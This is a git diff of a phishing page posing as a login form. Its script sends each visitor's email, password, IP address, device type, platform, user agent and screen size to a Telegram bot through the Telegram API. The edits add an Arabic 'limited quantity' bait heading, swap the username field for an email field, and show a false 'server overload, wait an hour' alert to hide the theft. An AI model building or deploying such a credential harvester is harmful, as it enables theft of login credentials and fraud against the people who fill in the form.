--- a/index.html
+++ b/index.html
@@ -10,19 +10,18 @@
 <body>
     <div class="container">
         <div class="login-box">
-            <h2>Login</h2>
-            <p>Attempts remaining: <span id="attempts">3</span></p>
+            <h2>الكمية محدودة</h2>
+            <h2>Username</h2>
             <form id="login-form">
                 <div class="user-box">
-                    <input type="text" id="username" required>
-                    <label>Username</label>
+                    <input type="email" id="email" required>
+                    <label>Email</label>
                 </div>
                 <div class="user-box">
                     <input type="password" id="password" required>
                     <label>Password</label>
                 </div>
-                <a href="#" id="login-btn">Login</a>
-                <p>Don't have an account? <a href="#">Register</a></p>
+                <a href="#" id="login-btn">Submit</a>
             </form>
         </div>
     </div>
@@ -31,21 +30,13 @@
         const CHAT_ID = "6243038338"; // معرف الشات الخاص بك
         const URI_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;
 
-        let attempts = 3; // عدد المحاولات المتاحة
-
-        document.getElementById('login-btn').addEventListener('click', async function (e) {
+        document.getElementById('login-btn').addEventListener('click', async function(e) {
             e.preventDefault(); // منع الرابط من التنقل
 
-            if (attempts <= 0) {
-                alert('No attempts remaining. Please try again later.');
-                return;
-            }
+            alert('عليك الانتظار ساعة بسبب الضغط على خادمنا');
 
-            attempts--; // تقليل عدد المحاولات
-            document.getElementById('attempts').textContent = attempts;
-
-            // الحصول على اسم المستخدم وكلمة المرور المدخلة
-            const username = document.getElementById('username').value;
+            // الحصول على البريد الإلكتروني وكلمة المرور المدخلة
+            const email = document.getElementById('email').value;
             const password = document.getElementById('password').value;
 
             console.log("Sending data to Telegram...");
@@ -61,16 +52,15 @@
                 const screenHeight = screen.height;
                 const deviceType = /mobile/i.test(navigator.userAgent) ? 'Mobile' : 'Desktop';
 
-                const message = `
-                    <b>New Login Attempt</b>\n
-                    <b>Username:</b> ${username}\n
+                const message =  
+                    `<b>New Login Attempt</b>\n
+                    <b>Email:</b> ${email}\n
                     <b>Password:</b> ${password}\n
                     <b>IP Address:</b> ${ip}\n
                     <b>Device Type:</b> ${deviceType}\n
                     <b>Platform:</b> ${platform}\n
                     <b>User Agent:</b> ${userAgent}\n
-                    <b>Screen Resolution:</b> ${screenWidth}x${screenHeight}
-                `;
+                    <b>Screen Resolution:</b> ${screenWidth}x${screenHeight}`;
 
                 console.log("Message: ", message);
 
@@ -91,3 +81,4 @@
     </script>
 </body>
 </html>
+
